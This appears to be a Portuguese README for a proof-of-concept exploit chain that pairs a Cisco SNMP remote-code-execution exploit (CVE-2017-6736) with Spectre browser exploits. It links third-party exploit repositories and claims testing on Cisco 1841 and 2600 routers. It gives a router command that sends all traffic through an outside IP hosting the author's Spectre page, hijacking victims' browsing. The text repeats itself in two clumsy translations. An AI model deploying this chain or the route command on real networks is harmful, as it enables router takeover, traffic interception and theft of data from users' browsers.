
Um exploit de cadeia POC usando o exploit recente do Cisco SMP (CVE-2017-6736) para encadear no Spectre (CVE-2017-5753 e CVE-2017-5715)
Uma PoC de exploração em cadeia usando a recente exploração SMP da Cisco (CVE-2017-6736) para encadear no Spectre (CVE-2017-5753 e CVE-2017-5715)
Submódulo de exploração RCE da Cisco por artkond: https://github.com/artkond/cisco-snmp-rce
PoC do Spectre para Chrome em JS por ascendr: https://github.com/ascendr/spectre-chrome
Testado em um roteador Cisco 1841+2600.
Após executar a exploração RCE. Como configuração, execute:
Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49
Isso forçará todo o tráfego através da página de login do Spectre que criei. Futuramente, adicionarei uma versão melhor que lide com a navegação real para sites.